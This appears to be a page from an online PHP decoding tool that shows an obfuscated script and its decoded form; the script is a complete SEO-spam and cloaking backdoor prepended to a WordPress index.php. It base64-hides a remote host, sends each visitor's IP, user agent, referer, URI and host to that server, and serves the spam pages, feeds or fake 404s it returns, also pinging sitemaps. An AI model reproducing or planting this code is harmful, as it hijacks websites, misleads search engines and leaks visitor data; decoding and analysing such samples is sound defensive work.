Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ihHzK; JpiT5: $JG8yz = base64_decode($JG8yz); goto bg73d; Ux0n9: ob_clean(..

Decoded Output download

<?php goto ihHzK; 
JpiT5: 
$JG8yz = base64_decode($JG8yz); 
goto bg73d; 
Ux0n9: 
ob_clean(); 
goto zdotP; 
zdotP: 
ob_end_clean(); 
goto gbqH0; 
M3hPC: 
exit; 
goto pA1EW; 
jMX28: 
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1]; 
goto Z_ai8; 
DTLjm: 
if (!(substr(trim($ckeNx[0]), -7) == "echokkk")) { 
    goto egNSG; 
} 
goto p0z1I; 
pA1EW: WSUsT: 
goto IhMOc; 
LgWRf: 
if (!(substr(trim($ckeNx[0]), -7) == "echo404")) { 
    goto WSUsT; 
} 
goto Nt6GY; 
ph7gm: 
error_reporting(0); 
goto Ux0n9; 
fJrM2: 
$ZT8uX = base64_encode(date_default_timezone_get()); 
goto gA5TJ; 
HGh3g: 
goto ZJ4n5; 
goto SSH46; 
SNMAj: 
if (!(substr(trim($ckeNx[0]), -7) == "echoxml")) { 
    goto SekWx; 
} 
goto BnQW5; 
BnQW5: 
header("Content-type: text/xml"); 
goto lZafu; 
dzJMY: 
$ckeNx = explode("[#*#*#]", $WmBIb); 
goto bX5nO; 
dY2AA: 
$FTuNs = "http://" . $JG8yz . "/index.php?domain=" . $BRqHd . "&uri=" . $eK0QQ . "&lan=" . $uOa2u . "&agent=" . $I2P8b . "&zone=" . $ZT8uX . "&ip=" . $ndVgf . "&goweb=" . base64_encode($JG8yz) . "&referer=" . $Yiv34; 
goto yBXzY; 
iLqq3: 
$Yiv34 = base64_encode(@$_SERVER["HTTP_REFERER"]); 
goto VZrw7; 
lZafu: 
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1]; 
goto Igw3K; 
unuQn: 
$I2P8b = base64_encode(@$_SERVER["HTTP_USER_AGENT"]); 
goto iLqq3; 
sjyXv: 
$mIaa6 = "https://"; 
goto jktOU; 
ihHzK: 
$JG8yz = "ZTYxeDMucmFoZ3R2LnRvcA=="; 
goto JpiT5; 
ySH8k: 
exit; 
goto DtP3g; 
Dc41f: 
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1]; 
goto FE4DR; 
AnrZ_: 
function FbXfE($jZXKv) 
{ 
    goto ok8d6; 
    YNTZu: 
    foreach ($viGVl as $BiDSm) { 
        goto kBql0; 
        z6O3G: 
        $FIPF3 = strpos($XuGF2, "Sitemap Notification Received") !== false || strpos($XuGF2, "") !== false ? "OK " : "<font color=red>ERROR </font><div style="background:#f5f5f5;padding:11px; border:1px solid #ccc;">" . $XuGF2 . "</div>"; 
        goto zxdFR; 
        kBql0: 
        $XuGF2 = rGVgm($BiDSm); 
        goto z6O3G; 
        zxdFR: 
        echo $BiDSm . "===>Sitemap: " . $FIPF3 . "<br/>"; 
        goto x520d; 
        x520d: XDnup: 
        goto tDwGp; 
        tDwGp: 
    } 
    goto P9Ftf; 
    ok8d6: 
    $viGVl = explode("|||", $jZXKv); 
    goto YNTZu; 
    P9Ftf: S_VtZ: 
    goto TJsam; 
    TJsam: 
} 
 
goto VTVns; 
YTSH0: 
$I_0Lo = @$_SERVER["HTTP_HOST"]; 
goto unuQn; 
wbQMT: 
$mIaa6 = "http://"; 
goto HGh3g; 
TFVv3: 
header("Status: 404 Not Found"); 
goto M3hPC; 
vMri0: 
$uOa2u = base64_encode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]); 
goto J7op6; 
nDgkZ: 
echo substr(trim($ckeNx[0]), 0, -8) . $ckeNx[1]; 
goto Fizd8; 
bg73d: 
header("Content-Type: text/html; charset=utf-8"); 
goto q2iOu; 
yvZnT: 
if (!strstr($WmBIb, "[#*#*#]")) { 
    goto EcQrX; 
} 
goto dzJMY; 
Z_ai8: 
exit; 
goto BlCHj; 
jktOU: ZJ4n5: 
goto vkRH2; 
Igw3K: 
exit; 
goto DfHog; 
RI2b6: fZ66i: 
goto SNMAj; 
J7op6: 
$eK0QQ = base64_encode(@$_SERVER["REQUEST_URI"]); 
goto YTSH0; 
gbqH0: 
ob_start(); 
goto vMri0; 
gA5TJ: 
if (viVeu()) { 
    goto hZoev; 
} 
goto wbQMT; 
DfHog: SekWx: 
goto aLrpq; 
FE4DR: 
exit; 
goto Fp6qt; 
bX5nO: 
if (!(substr(trim($ckeNx[0]), -8) == "echohtml")) { 
    goto fZ66i; 
} 
goto nDgkZ; 
VTVns: 
function RgVgM($m8TGR) 
{ 
    goto AqIaU; 
    pn4pG: kOCKZ: 
    goto j8yjv; 
    AqIaU: 
    $WmBIb = @file_get_contents($m8TGR); 
    goto Q20YA; 
    iAzd5: 
    curl_setopt($IPE3S, CURLOPT_RETURNTRANSFER, 1); 
    goto fmAKg; 
    WZ7PY: 
    curl_setopt($IPE3S, CURLOPT_SSL_VERIFYHOST, 0); 
    goto WUQnf; 
    f8q1a: 
    $IPE3S = curl_init(); 
    goto k09oR; 
    k09oR: 
    curl_setopt($IPE3S, CURLOPT_URL, $m8TGR); 
    goto WZ7PY; 
    KtBNw: 
    curl_close($IPE3S); 
    goto pn4pG; 
    Q20YA: 
    if ($WmBIb) { 
        goto kOCKZ; 
    } 
    goto f8q1a; 
    fmAKg: 
    $WmBIb = curl_exec($IPE3S); 
    goto KtBNw; 
    WUQnf: 
    curl_setopt($IPE3S, CURLOPT_SSL_VERIFYPEER, 0); 
    goto iAzd5; 
    j8yjv: 
    return $WmBIb; 
    goto eLGHR; 
    eLGHR: 
} 
 
goto L_G1X; 
vkRH2: 
$BRqHd = base64_encode($mIaa6 . $I_0Lo); 
goto dY2AA; 
Fizd8: 
exit; 
goto RI2b6; 
BlCHj: egNSG: 
goto LgWRf; 
aLrpq: 
if (!(substr(trim($ckeNx[0]), -7) == "echorss")) { 
    goto Cmgpq; 
} 
goto jovfm; 
dt7RE: 
Fbxfe($ckeNx[1]); 
goto ySH8k; 
q2iOu: 
set_time_limit(0); 
goto ph7gm; 
IhMOc: 
if (!(substr(trim($ckeNx[0]), -7) == "pingxml")) { 
    goto BS_Zx; 
} 
goto dt7RE; 
Nt6GY: 
header("HTTP/1.1 404 Not Found"); 
goto TFVv3; 
p0z1I: 
header("X-Robots-Tag: noindex"); 
goto jMX28; 
jovfm: 
header("Content-type: text/xml"); 
goto Dc41f; 
VZrw7: 
$ndVgf = base64_encode(@$_SERVER["REMOTE_ADDR"]); 
goto fJrM2; 
wV1YW: EcQrX: 
goto AnrZ_; 
DtP3g: BS_Zx: 
goto wV1YW; 
SSH46: hZoev: 
goto sjyXv; 
Fp6qt: Cmgpq: 
goto DTLjm; 
yBXzY: 
$WmBIb = rgvgm($FTuNs); 
goto yvZnT; 
L_G1X: 
function VIVeU() 
{ 
    goto ci0t3; 
    Lrjr_: 
    if (!empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { 
        goto r9Skr; 
    } 
    goto lys1C; 
    d8x0T: 
    return true; 
    goto aaj3X; 
    gwokc: 
    return true; 
    goto RTinU; 
    aaj3X: 
    goto L8eyy; 
    goto ZnAc1; 
    DnPBw: 
    goto L8eyy; 
    goto Fzjkq; 
    Fzjkq: r9Skr: 
    goto gwokc; 
    gOl6d: 
    if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { 
        goto xx8Zp; 
    } 
    goto Lrjr_; 
    w4hCP: 
    return true; 
    goto DnPBw; 
    RTinU: L8eyy: 
    goto sQQii; 
    lys1C: 
    goto L8eyy; 
    goto EuBNq; 
    sQQii: 
    return false; 
    goto yovbY; 
    ZnAc1: xx8Zp: 
    goto w4hCP; 
    ci0t3: 
    if (!empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { 
        goto T_LgC; 
    } 
    goto gOl6d; 
    EuBNq: T_LgC: 
    goto d8x0T; 
    yovbY: 
} ?><?php 
define('WP_USE_THEMES', true); 
require __DIR__ . '/wp-blog-header.php'; ?>

Did this file decode correctly?

Original Code

<?php goto ihHzK;
JpiT5:
$JG8yz = base64_decode($JG8yz);
goto bg73d;
Ux0n9:
ob_clean();
goto zdotP;
zdotP:
ob_end_clean();
goto gbqH0;
M3hPC:
exit;
goto pA1EW;
jMX28:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Z_ai8;
DTLjm:
if (!(substr(trim($ckeNx[0]), -7) == "\x65\x63\x68\x6f\153\153\x6b")) {
    goto egNSG;
}
goto p0z1I;
pA1EW: WSUsT:
goto IhMOc;
LgWRf:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\64\60\x34")) {
    goto WSUsT;
}
goto Nt6GY;
ph7gm:
error_reporting(0);
goto Ux0n9;
fJrM2:
$ZT8uX = base64_encode(date_default_timezone_get());
goto gA5TJ;
HGh3g:
goto ZJ4n5;
goto SSH46;
SNMAj:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\x78\x6d\x6c")) {
    goto SekWx;
}
goto BnQW5;
BnQW5:
header("\x43\157\156\164\145\x6e\164\x2d\x74\x79\x70\145\x3a\x20\164\145\170\x74\x2f\x78\155\x6c");
goto lZafu;
dzJMY:
$ckeNx = explode("\x5b\43\52\43\52\x23\x5d", $WmBIb);
goto bX5nO;
dY2AA:
$FTuNs = "\150\164\x74\x70\72\x2f\x2f" . $JG8yz . "\x2f\x69\x6e\x64\145\170\56\160\150\x70\77\144\x6f\x6d\141\x69\156\x3d" . $BRqHd . "\46\x75\x72\151\x3d" . $eK0QQ . "\46\154\x61\x6e\x3d" . $uOa2u . "\46\141\x67\145\x6e\164\75" . $I2P8b . "\46\x7a\157\x6e\145\75" . $ZT8uX . "\46\x69\x70\x3d" . $ndVgf . "\46\147\157\167\145\x62\x3d" . base64_encode($JG8yz) . "\46\x72\x65\146\145\162\145\162\75" . $Yiv34;
goto yBXzY;
iLqq3:
$Yiv34 = base64_encode(@$_SERVER["\x48\x54\124\120\137\x52\105\106\105\x52\105\122"]);
goto VZrw7;
lZafu:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Igw3K;
unuQn:
$I2P8b = base64_encode(@$_SERVER["\110\x54\124\x50\x5f\125\123\x45\122\137\101\107\105\116\x54"]);
goto iLqq3;
sjyXv:
$mIaa6 = "\x68\x74\164\160\x73\72\x2f\57";
goto jktOU;
ihHzK:
$JG8yz = "\x5a\x54\x59\x78\x65\x44\x4d\x75\x63\x6d\x46\x6f\x5a\x33\x52\x32\x4c\x6e\x52\x76\x63\x41\x3d\x3d";
goto JpiT5;
ySH8k:
exit;
goto DtP3g;
Dc41f:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto FE4DR;
AnrZ_:
function FbXfE($jZXKv)
{
    goto ok8d6;
    YNTZu:
    foreach ($viGVl as $BiDSm) {
        goto kBql0;
        z6O3G:
        $FIPF3 = strpos($XuGF2, "\123\151\164\x65\x6d\141\160\x20\x4e\x6f\164\x69\146\151\x63\x61\x74\151\x6f\x6e\x20\122\145\143\145\151\x76\x65\x64") !== false || strpos($XuGF2, "\351\200\x81\344\277\241\xe3\x81\225\343\202\214\xe3\201\x9f\343\202\265\xe3\x82\xa4\xe3\x83\210\xe3\203\x9e\343\x83\203\343\x83\x97\xe3\202\x92\345\217\227\xe4\xbf\xa1\343\x81\227\343\x81\xbe\343\x81\x97\343\x81\237") !== false ? "\117\x4b\x20\346\x88\x90\345\x8a\x9f" : "\74\146\157\x6e\x74\x20\x63\x6f\154\x6f\x72\75\x72\145\x64\76\105\122\x52\x4f\122\40\xe5\207\272\xe9\x94\x99\344\xba\x86\74\x2f\x66\157\x6e\x74\x3e\x3c\144\x69\x76\40\x73\x74\x79\154\x65\75\42\142\x61\143\x6b\147\162\x6f\x75\156\144\72\43\x66\x35\x66\x35\146\x35\x3b\x70\141\x64\x64\151\x6e\147\x3a\x31\x31\160\x78\x3b\x20\142\x6f\x72\144\145\x72\x3a\x31\x70\x78\x20\163\x6f\x6c\151\x64\x20\x23\x63\143\x63\73\42\76" . $XuGF2 . "\74\57\144\151\x76\76";
        goto zxdFR;
        kBql0:
        $XuGF2 = rGVgm($BiDSm);
        goto z6O3G;
        zxdFR:
        echo $BiDSm . "\75\x3d\75\x3e\123\x69\x74\x65\155\141\x70\72\x20" . $FIPF3 . "\74\x62\162\57\76";
        goto x520d;
        x520d: XDnup:
        goto tDwGp;
        tDwGp:
    }
    goto P9Ftf;
    ok8d6:
    $viGVl = explode("\174\174\174", $jZXKv);
    goto YNTZu;
    P9Ftf: S_VtZ:
    goto TJsam;
    TJsam:
}

goto VTVns;
YTSH0:
$I_0Lo = @$_SERVER["\110\x54\124\120\137\110\x4f\x53\124"];
goto unuQn;
wbQMT:
$mIaa6 = "\x68\164\x74\x70\72\57\57";
goto HGh3g;
TFVv3:
header("\123\x74\x61\x74\165\163\x3a\40\x34\x30\64\x20\116\x6f\164\40\106\x6f\165\156\144");
goto M3hPC;
vMri0:
$uOa2u = base64_encode(@$_SERVER["\110\x54\124\120\137\x41\x43\x43\105\x50\x54\x5f\114\101\x4e\107\x55\x41\107\x45"]);
goto J7op6;
nDgkZ:
echo substr(trim($ckeNx[0]), 0, -8) . $ckeNx[1];
goto Fizd8;
bg73d:
header("\103\x6f\156\164\145\156\164\x2d\124\171\160\x65\x3a\x20\164\145\x78\x74\x2f\x68\x74\x6d\154\73\x20\x63\x68\x61\162\x73\145\x74\75\x75\164\x66\x2d\x38");
goto q2iOu;
yvZnT:
if (!strstr($WmBIb, "\x5b\43\52\43\x2a\43\135")) {
    goto EcQrX;
}
goto dzJMY;
Z_ai8:
exit;
goto BlCHj;
jktOU: ZJ4n5:
goto vkRH2;
Igw3K:
exit;
goto DfHog;
RI2b6: fZ66i:
goto SNMAj;
J7op6:
$eK0QQ = base64_encode(@$_SERVER["\122\105\121\x55\x45\123\124\137\x55\x52\x49"]);
goto YTSH0;
gbqH0:
ob_start();
goto vMri0;
gA5TJ:
if (viVeu()) {
    goto hZoev;
}
goto wbQMT;
DfHog: SekWx:
goto aLrpq;
FE4DR:
exit;
goto Fp6qt;
bX5nO:
if (!(substr(trim($ckeNx[0]), -8) == "\145\x63\x68\157\150\164\x6d\x6c")) {
    goto fZ66i;
}
goto nDgkZ;
VTVns:
function RgVgM($m8TGR)
{
    goto AqIaU;
    pn4pG: kOCKZ:
    goto j8yjv;
    AqIaU:
    $WmBIb = @file_get_contents($m8TGR);
    goto Q20YA;
    iAzd5:
    curl_setopt($IPE3S, CURLOPT_RETURNTRANSFER, 1);
    goto fmAKg;
    WZ7PY:
    curl_setopt($IPE3S, CURLOPT_SSL_VERIFYHOST, 0);
    goto WUQnf;
    f8q1a:
    $IPE3S = curl_init();
    goto k09oR;
    k09oR:
    curl_setopt($IPE3S, CURLOPT_URL, $m8TGR);
    goto WZ7PY;
    KtBNw:
    curl_close($IPE3S);
    goto pn4pG;
    Q20YA:
    if ($WmBIb) {
        goto kOCKZ;
    }
    goto f8q1a;
    fmAKg:
    $WmBIb = curl_exec($IPE3S);
    goto KtBNw;
    WUQnf:
    curl_setopt($IPE3S, CURLOPT_SSL_VERIFYPEER, 0);
    goto iAzd5;
    j8yjv:
    return $WmBIb;
    goto eLGHR;
    eLGHR:
}

goto L_G1X;
vkRH2:
$BRqHd = base64_encode($mIaa6 . $I_0Lo);
goto dY2AA;
Fizd8:
exit;
goto RI2b6;
BlCHj: egNSG:
goto LgWRf;
aLrpq:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\x72\163\x73")) {
    goto Cmgpq;
}
goto jovfm;
dt7RE:
Fbxfe($ckeNx[1]);
goto ySH8k;
q2iOu:
set_time_limit(0);
goto ph7gm;
IhMOc:
if (!(substr(trim($ckeNx[0]), -7) == "\160\x69\156\147\x78\155\x6c")) {
    goto BS_Zx;
}
goto dt7RE;
Nt6GY:
header("\x48\124\x54\120\x2f\x31\x2e\61\40\64\x30\x34\40\x4e\157\x74\40\106\157\x75\156\x64");
goto TFVv3;
p0z1I:
header("\x58\55\122\157\x62\x6f\x74\x73\x2d\x54\x61\147\72\40\156\x6f\x69\x6e\x64\145\170");
goto jMX28;
jovfm:
header("\103\157\156\x74\145\156\164\55\164\171\x70\145\x3a\x20\x74\x65\170\x74\57\x78\x6d\154");
goto Dc41f;
VZrw7:
$ndVgf = base64_encode(@$_SERVER["\122\105\x4d\x4f\124\x45\137\x41\104\x44\x52"]);
goto fJrM2;
wV1YW: EcQrX:
goto AnrZ_;
DtP3g: BS_Zx:
goto wV1YW;
SSH46: hZoev:
goto sjyXv;
Fp6qt: Cmgpq:
goto DTLjm;
yBXzY:
$WmBIb = rgvgm($FTuNs);
goto yvZnT;
L_G1X:
function VIVeU()
{
    goto ci0t3;
    Lrjr_:
    if (!empty($_SERVER["\110\x54\124\x50\137\106\x52\x4f\x4e\124\x5f\105\x4e\104\137\x48\124\x54\120\123"]) && strtolower($_SERVER["\x48\x54\x54\x50\x5f\106\122\117\116\x54\x5f\x45\x4e\x44\137\110\124\124\120\x53"]) !== "\x6f\146\x66") {
        goto r9Skr;
    }
    goto lys1C;
    d8x0T:
    return true;
    goto aaj3X;
    gwokc:
    return true;
    goto RTinU;
    aaj3X:
    goto L8eyy;
    goto ZnAc1;
    DnPBw:
    goto L8eyy;
    goto Fzjkq;
    Fzjkq: r9Skr:
    goto gwokc;
    gOl6d:
    if (isset($_SERVER["\x48\124\124\120\137\x58\137\x46\117\122\x57\x41\122\x44\x45\x44\x5f\120\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\124\x50\137\x58\x5f\106\117\122\127\x41\x52\104\x45\104\x5f\120\x52\x4f\124\117"] === "\x68\164\x74\x70\x73") {
        goto xx8Zp;
    }
    goto Lrjr_;
    w4hCP:
    return true;
    goto DnPBw;
    RTinU: L8eyy:
    goto sQQii;
    lys1C:
    goto L8eyy;
    goto EuBNq;
    sQQii:
    return false;
    goto yovbY;
    ZnAc1: xx8Zp:
    goto w4hCP;
    ci0t3:
    if (!empty($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\124\124\120\x53"]) !== "\157\x66\146") {
        goto T_LgC;
    }
    goto gOl6d;
    EuBNq: T_LgC:
    goto d8x0T;
    yovbY:
} ?><?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';

Function Calls

None

Variables

None

Stats

MD5 0457b08e32547e239c221f693fe2f4df
Eval Count 0
Decode Time 40 ms